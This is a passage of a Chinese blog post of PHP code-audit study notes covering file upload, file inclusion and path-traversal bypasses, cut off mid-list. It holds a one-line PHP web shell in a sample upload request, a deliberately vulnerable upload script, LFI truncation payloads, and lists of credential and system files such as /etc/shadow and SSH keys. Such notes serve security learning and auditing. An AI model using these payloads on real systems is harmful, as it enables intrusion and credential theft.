<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="总前言：将之前抄的文进行汇总。方便查阅，侵删。 工作簿1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889">
<meta property="og:type" content="article">
<meta property="og:title" content="[代码审计]PHP篇">
<meta property="og:url" content="https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/index.html">
<meta property="og:site_name" content="TonyD0g">
<meta property="og:description" content="总前言：将之前抄的文进行汇总。方便查阅，侵删。 工作簿1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-07-27T07:23:07.000Z">
<meta property="article:modified_time" content="2023-08-10T13:35:02.999Z">
<meta property="article:author" content="TonyD0g">
<meta property="article:tag" content="代码审计">
<meta name="twitter:card" content="summary">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>[代码审计]PHP篇</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/friends/">friends</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/TonyD0g">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2022/09/25/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E6%B5%85%E8%B0%88%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E6%96%B9%E6%B3%95%E8%AE%BA/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2022/05/19/%E5%85%8D%E6%9D%80%E6%94%BB%E9%98%B2%E7%90%86%E8%AE%BA%E7%AF%871%E5%85%8D%E6%9D%80%E5%AD%A6%E4%B9%A0%E8%B7%AF%E7%BA%BF/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/&text=[代码审计]PHP篇" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/&title=[代码审计]PHP篇" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/&is_video=false&description=[代码审计]PHP篇" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=[代码审计]PHP篇&body=Check out this article: https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/&title=[代码审计]PHP篇" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/&title=[代码审计]PHP篇" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/&title=[代码审计]PHP篇" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/&title=[代码审计]PHP篇" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/&name=[代码审计]PHP篇&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://github.com/TonyD0g/2022/07/27/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1PHP%E7%AF%87/&t=[代码审计]PHP篇" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#工作簿"><span class="toc-number">1.</span> <span class="toc-text">工作簿</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#文件上传"><span class="toc-number">2.</span> <span class="toc-text">文件上传</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#文件包含"><span class="toc-number">3.</span> <span class="toc-text">文件包含</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#CSRF"><span class="toc-number">4.</span> <span class="toc-text">CSRF</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL注入"><span class="toc-number">5.</span> <span class="toc-text">SQL注入</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#URL跳转漏洞"><span class="toc-number">6.</span> <span class="toc-text">URL跳转漏洞</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#XSS漏洞"><span class="toc-number">7.</span> <span class="toc-text">XSS漏洞</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#变量覆盖漏洞"><span class="toc-number">8.</span> <span class="toc-text">变量覆盖漏洞</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#代码执行漏洞"><span class="toc-number">9.</span> <span class="toc-text">代码执行漏洞</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#反序列化漏洞"><span class="toc-number">10.</span> <span class="toc-text">反序列化漏洞</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#命令执行漏洞"><span class="toc-number">11.</span> <span class="toc-text">命令执行漏洞</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#任意文件下载"><span class="toc-number">12.</span> <span class="toc-text">任意文件下载</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#XXE"><span class="toc-number">13.</span> <span class="toc-text">XXE</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        [代码审计]PHP篇
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">TonyD0g</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-07-27T07:23:07.000Z" itemprop="datePublished">2022-07-27</time>
        
        (Updated: <time datetime="2023-08-10T13:35:02.999Z" itemprop="dateModified">2023-08-10</time>)
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" rel="tag">代码审计</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <a id="more"></a>



<p>总前言：<br>将之前抄的文进行汇总。方便查阅，侵删。</p>
<h1 id="工作簿"><a href="#工作簿" class="headerlink" title="工作簿"></a>工作簿</h1><figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br></pre></td><td class="code"><pre><span class="line"><span class="bullet">0. </span>cms后台: </span><br><span class="line"></span><br><span class="line">0.代码审计方法论：</span><br><span class="line"></span><br><span class="line">a.借助代码审计工具:kunlun-M,奇安信代码卫士，Fortify 等先去漏扫，然后再逐个快速排查，觉得没戏就溜</span><br><span class="line"></span><br><span class="line">b.敏感函数定位，反向查看</span><br><span class="line"></span><br><span class="line">c.全局审计</span><br><span class="line"></span><br><span class="line">d.功能点审计：文件上传，文件管理，登录认证，找回密码.</span><br><span class="line"></span><br><span class="line">1.tips</span><br><span class="line">a.</span><br><span class="line">不受gpc保护的 $<span class="emphasis">_SERVER 和 $_</span>FILES 变量</span><br><span class="line"></span><br><span class="line">b.</span><br><span class="line">利用报错获取路径：传入数组可能会引发报错.</span><br><span class="line"></span><br><span class="line">c.字符串截断</span><br><span class="line">%00,</span><br><span class="line">iconv函数转换截断:chr(128)~chr(255)都可以进行截断</span><br><span class="line"></span><br><span class="line">d.php:// 输入输出流</span><br><span class="line">php://input 不能获取 multipart/form-data 方式提交的数据。</span><br><span class="line"></span><br><span class="line">e.不严谨的正则表达式</span><br><span class="line">1.没有使用 ^ 和 $ 限定匹配开始位置.</span><br><span class="line">2.未使用 \ 去转义</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">1.分析状态：</span><br><span class="line">// 没准有戏</span><br><span class="line">// 没戏</span><br><span class="line">// 用这个函数过滤后，没辙</span><br><span class="line">// 证实有漏洞</span><br><span class="line"></span><br><span class="line">2.思路：</span><br><span class="line">(命令/代码执行)</span><br><span class="line">eval，assert，preg，replace，call，user，func，call<span class="emphasis">_user_</span>func，array</span><br><span class="line">system，exec，shell<span class="emphasis">_exec，``，passthru，pcntl_</span>exec，popen，proc_open等 </span><br><span class="line"></span><br><span class="line">(文件操作函数)</span><br><span class="line">copy,delete,fflush,file<span class="emphasis">_get_</span>contents,file<span class="emphasis">_put_</span>contents,fputcsv,fputs,fread,fscanf,fwrite,move<span class="emphasis">_upload_</span>file,readfile,rename,rmdir,unlink</span><br><span class="line"></span><br><span class="line">(文件包含)</span><br><span class="line">include require </span><br><span class="line"></span><br><span class="line">(变量覆盖)</span><br><span class="line">$a($b) extract() parse_str() importrequestvariables() $$</span><br><span class="line"></span><br><span class="line">(Sql注入)</span><br><span class="line">a.</span><br><span class="line">select insert update mysql_query mysqli </span><br><span class="line">character<span class="emphasis">_set_</span>connect='gbk' [宽字节注入]</span><br><span class="line"></span><br><span class="line">b.</span><br><span class="line">虽然使用了 addslashes 函数，但执行的sql语句如：</span><br><span class="line">select * from xtcms<span class="emphasis">_vod where d_</span>id = $id </span><br><span class="line">所以 addslashes 函数并没啥用,依旧能进行sql注入</span><br><span class="line">[数字型注入]</span><br><span class="line"></span><br><span class="line">c.</span><br><span class="line">stripslashes 和 trim连用等于没过滤</span><br><span class="line">$username = stripslashes(trim($_POST['name']));</span><br><span class="line"></span><br><span class="line">d.</span><br><span class="line">sql语句被单引号/双引号包围后,如果调用或包含了过滤函数，则无法绕过</span><br><span class="line"></span><br><span class="line">(xss)</span><br><span class="line">print，print<span class="emphasis">_r，echo，sprintf，die，var_</span>dump，var_export </span><br><span class="line">echo  [addslashes函数对js标签并不过滤] </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">(文件上传)</span><br><span class="line">$FILES，type="file"，上传，move<span class="emphasis">_upload_</span>file</span><br><span class="line"></span><br><span class="line">(反序列化)</span><br><span class="line">serialize() unserialize() <span class="emphasis">_construct _</span>destruct</span><br><span class="line"></span><br><span class="line">preg_replace</span><br><span class="line">usort   </span><br><span class="line"></span><br><span class="line">(逻辑漏洞)</span><br><span class="line">bp默认不加载js,可用于爆破密码</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">2.目前分析：</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">3.已经分析完毕的函数:</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">3.没戏:</span><br><span class="line"><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span><span class="code">```</span>`</span><br></pre></td></tr></table></figure>

<h1 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h1><p><strong>0.文件上传示例请求包</strong></p>
<figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">POST /admin/upload/file HTTP/1.1</span><br><span class="line">Host: 127.0.0.1:28089</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,<span class="emphasis">*/*</span>;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Content-Type: multipart/form-data; boundary=---------------------------278140426826446046161154929830</span><br><span class="line">Content-Length: 250</span><br><span class="line">Origin: http://127.0.0.1:28089</span><br><span class="line">Connection: close</span><br><span class="line">Referer: http://127.0.0.1:28089/admin/carousels</span><br><span class="line">Cookie: JSESSIONID=ADF196EF95A0DD1E9886D0EC373A560B</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Sec-Fetch-Dest: iframe</span><br><span class="line">Sec-Fetch-Mode: navigate</span><br><span class="line">Sec-Fetch-Site: same-origin</span><br><span class="line">Sec-Fetch-User: ?1</span><br><span class="line"></span><br><span class="line">-----------------------------278140426826446046161154929830</span><br><span class="line">Content-Disposition: form-data; name="file"; filename="1.jpg"</span><br><span class="line">Content-Type: image/jpeg</span><br><span class="line"></span><br><span class="line">GIF89a</span><br><span class="line"><span class="xml"><span class="php"><span class="meta">&lt;?php</span> <span class="keyword">eval</span>($_POST[<span class="number">1</span>]); <span class="meta">?&gt;</span></span></span></span><br><span class="line">-----------------------------278140426826446046161154929830--</span><br></pre></td></tr></table></figure>



<p><strong>1.普通上传:</strong></p>
<p>未进行文件类型和格式做合法性校验，任意文件上传<br>漏洞代码示例：<br>新建一个提供上传文件的 upload.html</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;form action&#x3D;&quot;upload_file.php&quot; method&#x3D;&quot;post&quot; enctype&#x3D;&quot;multipart&#x2F;form-data&quot;&gt;</span><br><span class="line">&lt;label for&#x3D;&quot;file&quot;&gt;Filename:&lt;&#x2F;label&gt;</span><br><span class="line">&lt;input type&#x3D;&quot;file&quot; name&#x3D;&quot;file&quot; id&#x3D;&quot;file&quot; &#x2F;&gt;</span><br><span class="line">&lt;input type&#x3D;&quot;submit&quot; name&#x3D;&quot;submit&quot; value&#x3D;&quot;Submit&quot; &#x2F;&gt;</span><br><span class="line">&lt;&#x2F;form&gt;</span><br><span class="line">&lt;&#x2F;body&gt;</span><br><span class="line">&lt;&#x2F;html&gt;</span><br></pre></td></tr></table></figure>

<p>创建上传脚本 upload_file.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if ($_FILES[&quot;file&quot;][&quot;error&quot;] &gt; 0)</span><br><span class="line">&#123;</span><br><span class="line">echo &quot;Error: &quot; . $_FILES[&quot;file&quot;][&quot;error&quot;] . &quot;&lt;br &#x2F;&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">echo &quot;Upload: &quot; . $_FILES[&quot;file&quot;][&quot;name&quot;] . &quot;&lt;br &#x2F;&gt;&quot;;</span><br><span class="line">echo &quot;Type: &quot; . $_FILES[&quot;file&quot;][&quot;type&quot;] . &quot;&lt;br &#x2F;&gt;&quot;;</span><br><span class="line">echo &quot;Size: &quot; . ($_FILES[&quot;file&quot;][&quot;size&quot;] &#x2F; 1024) . &quot; Kb&lt;br &#x2F;&gt;&quot;;</span><br><span class="line">echo &quot;Temp file: &quot; . $_FILES[&quot;file&quot;][&quot;tmp_name&quot;] . &quot;&lt;br &#x2F;&gt;&quot;;</span><br><span class="line">move_uploaded_file($_FILES[&quot;file&quot;][&quot;tmp_name&quot;],&quot;upload&#x2F;&quot; . $_FILES[&quot;file&quot;][&quot;name&quot;]);</span><br><span class="line">echo &quot;Stored in: &quot; . &quot;upload&#x2F;&quot; . $_FILES[&quot;file&quot;][&quot;name&quot;];</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>2.upload-labs</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">upload-labs通关记录：</span><br><span class="line">https:&#x2F;&#x2F;blog.csdn.net&#x2F;weixin_44677409&#x2F;article&#x2F;details&#x2F;92799366</span><br></pre></td></tr></table></figure>

<p><strong>3.漏洞防护:</strong></p>
<p>基于安全方面的考虑，应增加用户上传文件的限制，比如检查文件类型、限制文件大小，限定文件路径，文件名随机名、白名单限制文件上传类型等</p>
<p>学习来源:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">公众号Bypass 《PHP代码审计入门笔记》</span><br></pre></td></tr></table></figure>

</font>

<font size=4 >

<!-- more -->

<h1 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h1><p><strong>1.漏洞案例:</strong></p>
<p>有限制的本地文件包含:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include($_GET[&#39;file&#39;].&quot;.php&quot;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>%00截断:(有机会测试一下各个版本是否有效)</strong></p>
<p>?file=C://Windows//win.ini%00<br><strong>（window，magic_quotes_gpc=off，网络上盛传PHP小于5.3.4有效，未完全进行测试，亲测 PHP 5.2.17有效，PHP-5.3.29-nts无效）</strong></p>
<p>?file==../../../../../../../../../etc/passwd%00<br><strong>(需要 magic_quotes_gpc=off，PHP小于5.3.4有效)</strong></p>
<p><strong>路径长度截断：</strong></p>
<p>?file=../../../../../../../../../etc/passwd/././././././.[…]/./././././.<br><strong>(php版本小于5.2.8(?)可以成功，linux需要文件名长于4096，windows需要长于256)</strong></p>
<p><strong>点号截断：</strong></p>
<p>?file=../../../../../../../../../boot.ini/………[…]…………<br><strong>(php版本小于5.2.8(?)可以成功，只适用windows，点号需要长于256)</strong></p>
<p><strong>2.利用工具:(个人没用过，有机会试试)</strong></p>
<p>文件包含漏洞利用工具<br>LFISuite：<a href="https://github.com/D35m0nd142/LFISuite">https://github.com/D35m0nd142/LFISuite</a><br>LFI Scan &amp; Exploit Tool：<a href="https://github.com/P0cL4bs/Kadimus/">https://github.com/P0cL4bs/Kadimus/</a></p>
<p><strong>3.常见包含路径:</strong></p>
<p><strong>Windows:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">C:\boot.ini &#x2F;&#x2F;查看系统版本</span><br><span class="line">C:WindowsSystem32inetsrvMetaBase.xml &#x2F;&#x2F;IIS配置文件</span><br><span class="line">C:Windowsrepairsam &#x2F;&#x2F;存储系统初次安装的密码</span><br><span class="line">C:Program Filesmysqlmy.ini &#x2F;&#x2F;Mysql配置</span><br><span class="line">C:Program Filesmysqldatamysqluser.MYD &#x2F;&#x2F;Mysql root</span><br><span class="line">C:Windowsphp.ini &#x2F;&#x2F;php配置信息</span><br><span class="line">C:Windowsmy.ini &#x2F;&#x2F;Mysql配置信息C:Windowswin.ini &#x2F;&#x2F;Windows系统的一个基本系统配置文件</span><br></pre></td></tr></table></figure>

<p><strong>Linux:</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;root&#x2F;.ssh&#x2F;authorized_keys</span><br><span class="line">&#x2F;root&#x2F;.ssh&#x2F;id_rsa</span><br><span class="line">&#x2F;root&#x2F;.ssh&#x2F;id_ras.keystore</span><br><span class="line">&#x2F;root&#x2F;.ssh&#x2F;known_hosts &#x2F;&#x2F;记录每个访问计算机用户的公钥</span><br><span class="line">&#x2F;etc&#x2F;passwd</span><br><span class="line">&#x2F;etc&#x2F;shadow</span><br><span class="line">&#x2F;etc&#x2F;my.cnf &#x2F;&#x2F;mysql配置文件</span><br><span class="line">&#x2F;etc&#x2F;httpd&#x2F;conf&#x2F;httpd.conf &#x2F;&#x2F;apache配置文件</span><br><span class="line">&#x2F;root&#x2F;.bash_history &#x2F;&#x2F;用户历史命令记录文件</span><br><span class="line">&#x2F;root&#x2F;.mysql_history &#x2F;&#x2F;mysql历史命令记录文件</span><br><span class="line">&#x2F;proc&#x2F;mounts &#x2F;&#x2F;记录系统挂载设备</span><br><span class="line">&#x2F;porc&#x2F;config.gz &#x2F;&#x2F;内核配置文件</span><br><span class="line">&#x2F;var&#x2F;lib&#x2F;mlocate&#x2F;mlocate.db &#x2F;&#x2F;全文件路径</span><br><span class="line">&#x2F;porc&#x2F;self&#x2F;cmdline &#x2F;&#x2F;当前进程的cmdline参数</span><br></pre></td></tr></table></figure>

<p><strong>tips</strong></p>
<ul>
<li><figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&amp;path=../../../../../../D:/<span class="strong">**/**</span>/**/20230608100452833.mdb</span><br><span class="line">&amp;path=../../../../../../<span class="strong">**/**</span>/**/20230608100452833.mdb</span><br><span class="line">上面不可以，下面可以，好像不能出现盘符</span><br></pre></td></tr></table></figure>
</li>
<li><p>绕过 ../ </p>
<figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">URL编码绕过：攻击者可能尝试使用URL编码（如"%2e%2e"代替"../"）来混淆目录遍历防护机制。</span><br><span class="line"></span><br><span class="line">双字节编码绕过：使用Unicode编码字符（如"%c0%af"代替"/"）来绕过目录遍历过滤。</span><br><span class="line"></span><br><span class="line">多重编码绕过：结合多种编码方式，如URL编码和Unicode编码，来增加绕过的难度。</span><br><span class="line"></span><br><span class="line">相对路径绕过：尝试使用相对路径（如"../../"）来绕过绝对路径限制。</span><br><span class="line"></span><br><span class="line">空字节绕过：使用空字节（如"%00"）来截断文件路径，绕过字符串处理机制。</span><br><span class="line"></span><br><span class="line">文件名大小写绕过：尝试使用不同的文件名大小写来绕过对文件名的匹配限制。</span><br><span class="line"></span><br><span class="line">符号链接绕过：利用符号链接（如软链接或硬链接）来绕过路径检查，导致解析到非预期的目标。</span><br><span class="line"></span><br><span 